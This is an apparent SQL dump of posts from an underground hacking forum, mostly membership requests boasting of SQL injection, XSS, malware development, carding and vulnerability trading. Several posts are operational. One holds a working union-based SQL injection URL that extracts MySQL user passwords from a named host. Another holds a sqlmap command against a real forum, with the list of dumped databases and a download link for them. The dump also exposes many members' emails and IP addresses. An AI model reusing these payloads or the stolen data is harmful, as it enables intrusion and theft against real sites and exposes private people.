[b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: -_-\r\n [b]e-mail[/b]: jameszartjzart@hotmail.com\r\n [b]Info[/b]: i don\\\'t get what you want really to know but all i know i have some customers and you have something to sell so i would like to join you to see how we can do business also i\\\'m expert in this field so i can easily determine fake vulnerability from real one from range of simple reflected XSS in 4 line cms to remote windows kernel pool exploit ;) let\\\'s see what you got guys ....', 1, 0, '124.120.17.19', 0, 1, 0, 0, 0), (1250, 1155, 0, 'Invite', 2, 'New invite', 1405489511, '[b]Name[/b]: \\\">\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: dsds\r\n [b]e-mail[/b]: maziangamy@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '197.34.213.0', 0, 1, 0, 0, 0), (1251, 1156, 0, 'Invite', 2, 'New invite', 1405491189, '[b]Name[/b]: codezap\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: codetda@gmail.com\r\n [b]e-mail[/b]: codetda@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '59.184.162.142', 0, 1, 0, 0, 0), (1252, 1157, 0, 'Invite', 2, 'New invite', 1405491266, '[b]Name[/b]: codezap\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: codetda@gmail.com\r\n [b]e-mail[/b]: codetda@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '59.184.162.142', 0, 1, 0, 0, 0), (1253, 1158, 0, 'Invite', 2, 'New invite', 1405491360, '[b]Name[/b]: codezap\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: codetda@gmail.com\r\n [b]e-mail[/b]: codetda@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '59.184.162.142', 0, 1, 0, 0, 0), (1254, 1159, 0, 'Invite', 2, 'New invite', 1405491394, '[b]Name[/b]: MadHunteR\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: iso.saygili@hotmail.com\r\n [b]Info[/b]: I am Information Security Researcher. I am interested cyber security, python etc..', 1, 0, '31.145.29.42', 0, 1, 0, 0, 0), (1255, 1160, 0, 'Invite', 2, 'New invite', 1405499640, '[b]Name[/b]: Mr NoRvI\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: jccnfd@jaber.com\r\n [b]e-mail[/b]: bohr4me@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '41.100.226.161', 0, 1, 0, 0, 0), (1256, 1161, 0, 'Invite', 2, 'New invite', 1405499664, '[b]Name[/b]: pouet\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: pouet@bi.tk\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '90.15.219.44', 0, 1, 0, 0, 0), (1257, 1162, 0, 'Invite', 2, 'New invite', 1405500092, '[b]Name[/b]: mombay\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 321321\r\n [b]e-mail[/b]: sec_contact@yahoo.com\r\n [b]Info[/b]: PHP, HTML5, JQUERY/JAVASCRIPT, CSS3, ACTIONSCRIPT developer.\r\n\r\nSQLi, LFI, RFI, BUFFER OVERFLOW Maitrise\r\n .', 1, 0, '41.103.172.161', 0, 1, 0, 0, 0), (1258, 1163, 0, 'Invite', 2, 'New invite', 1405501156, '[b]Name[/b]: jhN\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: private@jabber.at\r\n [b]e-mail[/b]: joaomvarelas@gmail.com\r\n [b]Info[/b]: Hello, I am portuguese and I am 17 years old. I love everything that includes security. Back in 2006, when I had my first laptop, I used to play games and download stuff until I found an defaced website. I started to make a research about what was hacking and exploitation. The passion started. Now I am on the last year of the high school, and I will proceed to the college as Informatics Engineering. You can contact me through email, jabber, linkedin (https://www.linkedin.com/in/joaovarelas), twitter (https://twitter.com/joaovarelas) and facebook (https://www.facebook.com/x4ax4fx41x4f)\r\n\r\nHope we can do some projects together..', 1, 0, '89.155.83.222', 0, 1, 0, 0, 0), (1259, 1164, 0, 'Invite', 2, 'New invite', 1405506077, '[b]Name[/b]: cc0de\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: cc0de@yahoo.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '105.111.33.239', 0, 1, 0, 0, 0), (1260, 1165, 0, 'Invite', 2, 'New invite', 1405514463, '[b]Name[/b]: Eibich\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: teibich@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '87.189.248.199', 0, 1, 0, 0, 0), (1261, 1166, 0, 'Invite', 2, 'New invite', 1405514521, '[b]Name[/b]: Pr0xY\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: fucked@asshole.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '144.76.196.70', 0, 1, 0, 0, 0), (1262, 1167, 0, 'Invite', 2, 'New invite', 1405519391, '[b]Name[/b]: TestTest\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: NopeNope\r\n [b]e-mail[/b]: meagergimp@monumentmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '50.1.62.229', 0, 1, 0, 0, 0), (1263, 1168, 0, 'Invite', 2, 'New invite', 1405520537, '[b]Name[/b]: ahmed\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: melod@xmpp.ru\r\n [b]e-mail[/b]: l2le@yahoo.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '151.238.101.218', 0, 1, 0, 0, 0), (1264, 1169, 0, 'Invite', 2, 'New invite', 1405521353, '[b]Name[/b]: n4k3dal13n\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: n4k3dal13n@hotmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '72.38.35.22', 0, 1, 0, 0, 0), (1265, 1170, 0, 'Invite', 2, 'New invite', 1405521899, '[b]Name[/b]: foxy\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: foxy.sec@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '37.8.46.122', 0, 1, 0, 0, 0), (1266, 1171, 0, 'Invite', 2, 'New invite', 1405523367, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n .', 1, 0, '88.70.67.127', 0, 1, 0, 0, 0), (1267, 1172, 0, 'Invite', 2, 'New invite', 1405523382, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n .', 1, 0, '88.70.67.127', 0, 1, 0, 0, 0), (1268, 1173, 0, 'Invite', 2, 'New invite', 1405523389, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \n .', 1, 0, '88.70.67.127', 0, 1, 0, 0, 0), (1269, 1174, 0, 'Invite', 2, 'New invite', 1405529010, '[b]Name[/b]: samirsamo1337\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: i don have\r\n [b]e-mail[/b]: samirsamo123@hotmail.com\r\n [b]Info[/b]: c++ c# php ect is my passion.\r\nexpert in xss and rce..', 1, 0, '213.207.62.15', 0, 1, 0, 0, 0), (1789, 1580, 0, 'Kingbeef', 3, 'ÃÂüð÷þý (ÿþôôþüõý)', 1408965280, 'MQ off\r\nFile_priv Y\r\n\r\n[CODE]http://ec2-54-243-253-27.compute-1.amazonaws.com/bscarddetails.php?cardID=9129+and+0+union+select+concat_ws(%27:%27,User,Password,File_priv)+from+mysql.user--+k[/CODE]', 1, 0, '', 0, 1, 0, 0, 0), (1272, 1176, 0, 'Invite', 2, 'New invite', 1405531929, '[b]Name[/b]: rDNix\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: mynamemishal@gmail.com\r\n [b]e-mail[/b]: mynamemishal@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '199.255.211.60', 0, 1, 0, 0, 0), (1273, 1177, 0, 'Invite', 2, 'New invite', 1405533837, '[b]Name[/b]: powersw\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 6578844\r\n [b]e-mail[/b]: powersw@hushmail.com\r\n [b]Info[/b]: sql injection knowledge very well\r\nworking for small pentest firm.', 1, 0, '46.123.28.128', 0, 1, 0, 0, 0), (1274, 1178, 0, 'Invite', 2, 'New invite', 1405535637, '[b]Name[/b]: cyberdony2k\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: cyberdony2k@gmail.com\r\n [b]Info[/b]: I have expertise in reverse engineering and fuzzing. To be more specific, I have excellent skills of crash analysis on all the platforms(linux/windows/OS X). I have found bugs in browsers and OS X apps.\r\n .', 1, 0, '27.34.243.186', 0, 1, 0, 0, 0), (1275, 1179, 0, 'Invite', 2, 'New invite', 1405536389, '[b]Name[/b]: lolwat\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: lolwat@notmailinator.com\r\n [b]Info[/b]: suck a dick, that\\\'s what..', 1, 0, '94.126.178.1', 0, 1, 0, 0, 0), (1276, 1180, 0, 'Invite', 2, 'New invite', 1405539421, '[b]Name[/b]: kaourzi\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: kaourzi@yopmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '82.236.160.231', 0, 1, 0, 0, 0), (1277, 1181, 0, 'Invite', 2, 'New invite', 1405578947, '[b]Name[/b]: i-Hmx\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: leetr1z\r\n [b]e-mail[/b]: n0p1337@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '197.223.248.202', 0, 1, 0, 0, 0), (1278, 1182, 0, 'Invite', 2, 'New invite', 1405593955, '[b]Name[/b]: g0rx\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: g0r@jabber.dk\r\n [b]e-mail[/b]: g0rx@bk.ru\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '41.142.14.62', 0, 1, 0, 0, 0), (1279, 1183, 0, 'Invite', 2, 'New invite', 1405594067, '[b]Name[/b]: g0rx\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: g0r@jabber.dk\r\n [b]e-mail[/b]: g0rx@bk.ru\r\n [b]Info[/b]: Hi,I m hacker i have 0day and exploit . i want to share and get in touch ..', 1, 0, '41.142.14.62', 0, 1, 0, 0, 0), (1280, 1184, 0, 'Invite', 2, 'New invite', 1405597398, '[b]Name[/b]: hack3core\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ross@kaddafi.me\r\n [b]e-mail[/b]: hack3core@yahoo.com\r\n [b]Info[/b]: Pentest.Decoding.Carding.', 1, 0, '178.212.111.35', 0, 1, 0, 0, 0), (1281, 1185, 0, 'Invite', 2, 'New invite', 1405598770, '[b]Name[/b]: frtour\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: frtour@yopmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '185.3.135.122', 0, 1, 0, 0, 0), (1282, 1186, 0, 'Invite', 2, 'New invite', 1405599084, '[b]Name[/b]: deadpixel\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: deadpixel@safe-mail.net\r\n [b]e-mail[/b]: deadpixel@safe-mail.net\r\n [b]Info[/b]: Exploit development/improvement\r\nC/C++/Python expert\r\nMalware development\r\nPentesting expert.', 1, 0, '209.159.142.235', 0, 1, 0, 0, 0), (1283, 1187, 0, 'Invite', 2, 'New invite', 1405600909, '[b]Name[/b]: powersw\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 6578844\r\n [b]e-mail[/b]: powersw@hushmail.com\r\n [b]Info[/b]: sql.', 1, 0, '46.122.155.176', 0, 1, 0, 0, 0), (3047, 2507, 0, 'st1x0', 171, 'db icloud', 1464181751, 'Привет, где можно найти или купить базу icloud? с данными очень надо в связи с забыл свой, а труба лежит мертвым грузом. Коробки нет и чека.', 1, 0, '217.22.171.217', 0, 1, 0, 0, 0), (1285, 1189, 0, 'Invite', 2, 'New invite', 1405625018, '[b]Name[/b]: Anonymous\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: hadopi@outlook.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '212.83.132.195', 0, 1, 0, 0, 0), (1286, 1190, 0, 'Invite', 2, 'New invite', 1405655972, '[b]Name[/b]: xapeka\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 42039423\r\n [b]e-mail[/b]: xapeka@xakpe.ru\r\n [b]Info[/b]: DONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICK.', 1, 0, '203.217.39.112', 0, 1, 0, 0, 0), (1287, 1191, 0, 'Invite', 2, 'New invite', 1405656157, '[b]Name[/b]: xapeka\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 42039423\\\'\r\n [b]e-mail[/b]: xapeka@xakpe.ru\r\n [b]Info[/b]: DONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICKDONKEYDICK.', 1, 0, '203.217.39.112', 0, 1, 0, 0, 0), (1288, 1192, 0, 'Invite', 2, 'New invite', 1405663464, '[b]Name[/b]: sandgun_cypher\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: sandguncypher@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '117.243.217.129', 0, 1, 0, 0, 0), (1289, 1193, 0, 'Invite', 2, 'New invite', 1405669712, '[b]Name[/b]: c0ld\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: rohanbirtia@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '115.249.10.252', 0, 1, 0, 0, 0), (1290, 1194, 0, 'Invite', 2, 'New invite', 1405691651, '[b]Name[/b]: Babar1337Khan\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: babar1337khan@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '182.185.0.148', 0, 1, 0, 0, 0), (1291, 1083, 1224, 'null', 9, '', 1405702017, '[quote=bo0om;1224]ÑÂúуÃȄÂ\r\nóрðц, ÑÂûøòðù, ÿøшø ò öðñу, [email]mb@exploit.im[/email]\r\nрð÷óþòðрøòðù þ цõýõ.[/quote]\r\n\r\nñûѠòøôøüþ ѠþтÿуÑÂúþü ÿрþôþñðû ÿрþфøт , ÿþóþòþрø Ѡчõûþü õÑÂûø õÑÂть òрõüÑÂ?', 1, 0, '95.153.170.124', 0, 1, 0, 0, 0), (1292, 1083, 1291, 'w0rm', 1, '', 1405702258, 'Ñ ÑÂýøü ÑÂÿøÑÂыòðÃȄÂѠø ôþñðòøû ÑÂюôð ýð фþруü, ÑÂûøûø рðýьшõ ÑÂтþт шþÿ чõü üы ýðшûø øýьõúцøю. ;(', 1, 0, '178.44.218.20', 0, 1, 0, 0, 0), (1293, 1195, 0, 'w0rm', 1, 'http://raspberry.ws', 1405707041, 'þчõрõôýþù úðрôøýó ñþрô.\r\n÷ð ðòтþрÑÂтòþü [B]hackdays[/B]\r\n[URL=\"http://195.3.144.88/raspberry.ws.zip\"]download[/URL]', 1, 0, '178.44.169.39', 0, 1, 0, 0, 0), (1294, 1196, 0, 'w0rm', 1, 'proclub.ws', 1405718951, '[code]\r\nsqlmap.py -u \"http://www.proclub.ws/forum/register.php?do=register\" --data=\"s=&securitytoken=guest&do=addmember&url=index.php&agree=1&password_md5=44fdec47036f482b68b748f9d786801b&passwordconfirm_md5=44fdec47036f482b68b748f9d786801b&day=0&month=0&year=0&invitecode=12345%27%22&username=ssss&password=&passwordconfirm=&email=sss%40mail.ru&emailconfirm=ssss%40mail.ru&nospamnumber=0&nospam=2&userfield%5Bfield5%5D=N%2FA&userfield%5Bfield5_set%5D=1&referrername=&timezoneoffset=0&dst=\" --dbs\r\n[/code]\r\n\r\n[*] cpro_main\r\n\r\n[*] crdclub_mpro_crdclub\r\n\r\n[*] information_schema\r\n\r\n[*] proclub_db\r\n\r\n[*] verified\r\n\r\n[*] verified_new\r\n\r\n[URL=\"sftp://195.3.144.88/proclub_db.zip\"]download[/URL]', 1, 0, '178.44.169.39', 0, 1, 0, 0, 0), (1297, 1199, 0, 'Invite', 2, 'New invite', 1405749430, '[b]Name[/b]: Barakat\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: pw21@yahoo.com\r\n [b]Info[/b]: [#]My name: MahmoudBarakat .\r\n[#]Iam From Egypt .\r\n[#]In Egyptian Shell Team .\r\n[#]I have experienced in:\r\n[#]Spamming - website hacking - security .\r\n[#]I hope that joined the buying and selling of vulnerabilities.\r\n[#]Some of the vulnerabilities you deal with it in advance: \r\n[#]XSS - Sql injection - LFI - RFI - UploadShell - BufferOverflow - CSRF - vuln of joomla - vuln of wordpress - jce - DDos .\r\n[#]GoodLuck\r\n[+]Barakat..', 1, 0, '41.129.38.2', 0, 1, 0, 0, 0), (1298, 1200, 0, 'Invite', 2, 'New invite', 1405777728, '[b]Name[/b]: aamsyar3\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: aamsyar3@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '183.171.168.209', 0, 1, 0, 0, 0), (1299, 1201, 0, 'Invite', 2, 'New invite', 1405777762, '[b]Name[/b]: aamsyar3\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: aamsyar3@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '183.171.168.209', 0, 1, 0, 0, 0), (1300, 1202, 0, 'Invite', 2, 'New invite', 1405777855, '[b]Name[/b]: Abr1k0s\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: Helm@list.ru\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '93.187.180.159', 0, 1, 0, 0, 0), (1301, 1203, 0, 'Invite', 2, 'New invite', 1405814446, '[b]Name[/b]: h0x\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: \r\n [b]e-mail[/b]: h0x@offensive-security.it\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 12pMkQZwhdmTejeASFBoT3sQaureRnCZyE\r\n .', 1, 0, '151.15.145.76', 0, 1, 0, 0, 0), (1295, 1197, 0, 'Invite', 2, 'New invite', 1405722042, '[b]Name[/b]: Stelios\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: steliosmaniak4@gmail.com\r\n [b]Info[/b]: ITsecurity,Security Researcher,Ethical Hacker\r\n .', 1, 0, '87.202.9.9', 0, 1, 0, 0, 0), (1296, 1198, 0, 'Invite', 2, 'New invite', 1405724295, '[b]Name[/b]: AN0NT0XIC\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: steliosmaniak4@gmail.com\r\n [b]Info[/b]: .', 1, 0, '87.202.9.9', 0, 1, 0, 0, 0), (1302, 1204, 0, 'Invite', 2, 'New invite', 1405877994, '[b]Name[/b]: goaut\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: goaut@jappix.com\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: 1.Опыт в поиске web уязвимостях\r\n2.Пишу сплоенты под разные cms(в исходниках ариэнтируюсь замечательно )\r\n3.Знаю php,c,c++,c#,vb,vb.net\r\n\r\n .', 1, 0, '88.81.41.168', 0, 1, 0, 0, 0), (1303, 1205, 0, 'w0rm', 1, 'úþýтðúты úþüðýôы.', 1405879200, 'ò ôðýýþü тþÿøúõ ÑÂþñøрðõü ðúтуðûьýыõ úþýтðúты òÑÂõх учðÑÂтýøúþò ÿрþõúтð.\r\nÿрøüõр:\r\n[quote]\r\nw0rm.\r\nJabber: [email]root@w0rm.in[/email][/quote]', 1, 0, '95.71.229.228', 0, 1, 0, 0, 0), (1304, 1206, 0, 'w0rm', 1, 'úþýфõрõýцøѠw0rm.in', 1405879274, 'ßрõôûþóðю ÑÂþñрðть jabber úþýфу ýð ÑÂûõôующõù ýõôõûõ ø þñÑÂуôøть ýðшø ÿûðýы ýð ñуôущõõ.', 1, 0, '95.71.229.228', 0, 1, 0, 0, 0), (1305, 1206, 1304, 'null', 9, '', 1405892347, '[quote=w0rm;1304]ÿрõôûþóðю ÑÂþñрðть jabber úþýфу ýð ÑÂûõôующõù ýõôõûõ ø þñÑÂуôøть ýðшø ÿûðýы ýð ñуôущõõ.[/quote]\r\n\r\nÑÂþóûðÑÂõý ÿþÑÂûõ 28 чøÑÂûð, üыÑÂûõù ø ÿрõôûþöõýøù üýþóþ))', 1, 0, '95.153.199.64', 0, 1, 0, 0, 0), (1306, 1205, 1303, 'kx00', 6, '', 1405917433, 'Jabber: [email]m0estr0@exploit.im[/email] \r\nMail: [email]kx00ru@gmail.com[/email]', 1, 1, '31.192.254.207', 0, 1, 0, 0, 0), (1307, 1207, 0, 'Invite', 2, 'New invite', 1405945485, '[b]Name[/b]: overraidy\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: overraidy\r\n [b]e-mail[/b]: overraidy@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n Registration coast 200$\r\n we accept only BTC\r\n 1EBs4QeCv6eAUQaNQhwnTjVa78ZBwJ7aUB\r\n .', 1, 0, 